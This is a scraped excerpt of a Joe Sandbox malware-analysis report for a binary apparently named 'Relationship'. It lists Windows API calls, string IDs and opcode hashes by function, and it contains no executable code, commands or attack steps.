                                                                                                                                                                                                                                                                            • timeGetTime.WINMM ref: 00C5EFCB
                                                                                                                                                                                                                                                                              • Part of subcall function 00C0F215: timeGetTime.WINMM(?,?,00C5EFEB), ref: 00C0F219
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00C5EFF8
                                                                                                                                                                                                                                                                            • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00C5F01C
                                                                                                                                                                                                                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C5F03E
                                                                                                                                                                                                                                                                            • SetActiveWindow.USER32 ref: 00C5F05D
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C5F06B
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C5F08A
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000000FA), ref: 00C5F095
                                                                                                                                                                                                                                                                            • IsWindow.USER32 ref: 00C5F0A1
                                                                                                                                                                                                                                                                            • EndDialog.USER32(00000000), ref: 00C5F0B2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                            • String ID: BUTTON
                                                                                                                                                                                                                                                                            • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C5F374
                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C5F38A
                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C5F39B
                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C5F3AD
                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C5F3BE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                            • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                            • Opcode ID: acb1ab3758ec742c9aad8c6478c0b8affd45aaf8000bed137cb20160c80b6900
                                                                                                                                                                                                                                                                            • Instruction ID: c3849d265586a8a62674069fd9b20ef0127ad5035da01d58fc1b20ce1814b77c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: acb1ab3758ec742c9aad8c6478c0b8affd45aaf8000bed137cb20160c80b6900
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F311E335A8011C39E724A761CC0AEFF7BBCEFD1B00F0005797D11E30E1DAA05949C5A0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00C5A9D9
                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00C5AA44
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00C5AA64
                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 00C5AA7B
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00C5AAAA
                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 00C5AABB
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00C5AAE7
                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 00C5AAF5
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00C5AB1E
                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 00C5AB2C
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00C5AB55
                                                                                                                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00C5AB63
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5ad745fddc7de5a9e05b059a4e2e0316d9a6556fe84979deb676abc7c9ee3ce0
                                                                                                                                                                                                                                                                            • Instruction ID: 40a95cd5cee51b934042f51772661ff0e6c4183115e3dba812f0a1b39def4eab
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ad745fddc7de5a9e05b059a4e2e0316d9a6556fe84979deb676abc7c9ee3ce0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A55118789047852AFB35D7618810BAABFB48F11381F084699CDD2171C2DA649FCCCBAB
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00C56649
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00C56662
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00C566C0
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00C566D0
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00C566E2
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00C56736
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00C56744
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00C56756
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00C56798
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00C567AB
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C567C1
                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00C567CE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                            • Opcode ID: 40ccf805d5bc3f11a8beed77c3de7662c41d673231f971af32a85f4dab0ae1b2
                                                                                                                                                                                                                                                                            • Instruction ID: 1d14b8f05a2eb2920b864a26ae779403aeadf4f5c357f94ece965c57330df27d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40ccf805d5bc3f11a8beed77c3de7662c41d673231f971af32a85f4dab0ae1b2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66512F75A00209AFDF18CF68CD85BAEBBB5FB48315F508129F91AE7290D770AE44CB54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BF1488,?,00000000,?,?,?,?,00BF145A,00000000,?), ref: 00BF1865
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00BF1521
                                                                                                                                                                                                                                                                            • KillTimer.USER32(00000000,?,?,?,?,00BF145A,00000000,?), ref: 00BF15BB
                                                                                                                                                                                                                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 00C329B4
                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00BF145A,00000000,?), ref: 00C329E2
                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00BF145A,00000000,?), ref: 00C329F9
                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00BF145A,00000000), ref: 00C32A15
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C32A27
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                            • String ID:
APIs
  • Part of subcall function 00BF2234: GetWindowLongW.USER32(?,000000EB), ref: 00BF2242
• GetSysColor.USER32(0000000F), ref: 00BF2152
Memory Dump Source
• Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
Similarity
• API ID: ColorLongWindow
• String ID:
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00C40D31,00000001,0000138C,00000001,00000000,00000001,?,00C6EEAE,00CC2430), ref: 00C5A091
• LoadStringW.USER32(00000000,?,00C40D31,00000001), ref: 00C5A09A
  • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
• GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00C40D31,00000001,0000138C,00000001,00000000,00000001,?,00C6EEAE,00CC2430,?), ref: 00C5A0BC
• LoadStringW.USER32(00000000,?,00C40D31,00000001), ref: 00C5A0BF
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C5A1E0
Similarity
• API ID: HandleLoadModuleString$Message_wcslen
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
APIs
  • Part of subcall function 00BF8577: _wcslen.LIBCMT ref: 00BF858A
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C51093
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C510AF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C510CB
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C510F5
• CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00C5111D
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C51128
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C5112D
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C84AD9
• CreateCompatibleDC.GDI32(00000000), ref: 00C84AE0
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C84AF3
• SelectObject.GDI32(00000000,00000000), ref: 00C84AFB
• GetPixel.GDI32(00000000,00000000,00000000), ref: 00C84B06
• DeleteDC.GDI32(00000000), ref: 00C84B10
• GetWindowLongW.USER32(?,000000EC), ref: 00C84B1A
• SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00C84B30
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00C84B3C
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                                            • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C746B9
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00C746E7
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00C746F1
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7478A
                                                                                                                                                                                                                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00C7480E
                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C74932
                                                                                                                                                                                                                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00C7496B
                                                                                                                                                                                                                                                                            • CoGetObject.OLE32(?,00000000,00C90B64,?), ref: 00C7498A
                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00C7499D
                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C74A21
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C74A35
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 429561992-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00C68538
                                                                                                                                                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C685D4
                                                                                                                                                                                                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 00C685E8
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00C90CD4,00000000,00000001,00CB7E8C,?), ref: 00C68634
                                                                                                                                                                                                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C686B9
                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 00C68711
                                                                                                                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00C6879C
                                                                                                                                                                                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C687BF
                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00C687C6
                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00C6881B
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00C68821
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C5039F
                                                                                                                                                                                                                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00C503F8
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C5040A
                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C5042A
                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00C5047D
                                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C50491
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C504A6
                                                                                                                                                                                                                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00C504B3
                                                                                                                                                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C504BC
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C504CE
                                                                                                                                                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C504D9
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00C5A65D
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00C5A6DE
                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 00C5A6F9
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00C5A713
                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 00C5A728
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00C5A740
                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 00C5A752
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00C5A76A
                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 00C5A77C
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00C5A794
                                                                                                                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00C5A7A6
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                            • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32 ref: 00C741D1
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00C741DC
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00C90B44,?), ref: 00C74236
                                                                                                                                                                                                                                                                            • IIDFromString.OLE32(?,?), ref: 00C742A9
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C74341
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C74393
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                            • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 00C68C9C
                                                                                                                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C68CAC
                                                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C68CB8
                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C68D55
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68D69
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68D9B
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C68DD1
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68DDA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                            • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateMenu.USER32 ref: 00C84715
                                                                                                                                                                                                                                                                            • SetMenu.USER32(?,00000000), ref: 00C84724
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C847AC
                                                                                                                                                                                                                                                                            • IsMenu.USER32(?), ref: 00C847C0
                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00C847CA
                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C847F7
                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 00C847FF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                            • String ID: 0$F
                                                                                                                                                                                                                                                                            • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                              • Part of subcall function 00C545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C54620
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00C528B1
                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 00C528BC
                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 00C528D8
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C528DB
                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00C528E4
                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 00C528F8
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C528FB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                            • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                              • Part of subcall function 00C545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C54620
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00C52990
                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 00C5299B
                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 00C529B7
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C529BA
                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00C529C3
                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 00C529D7
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C529DA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
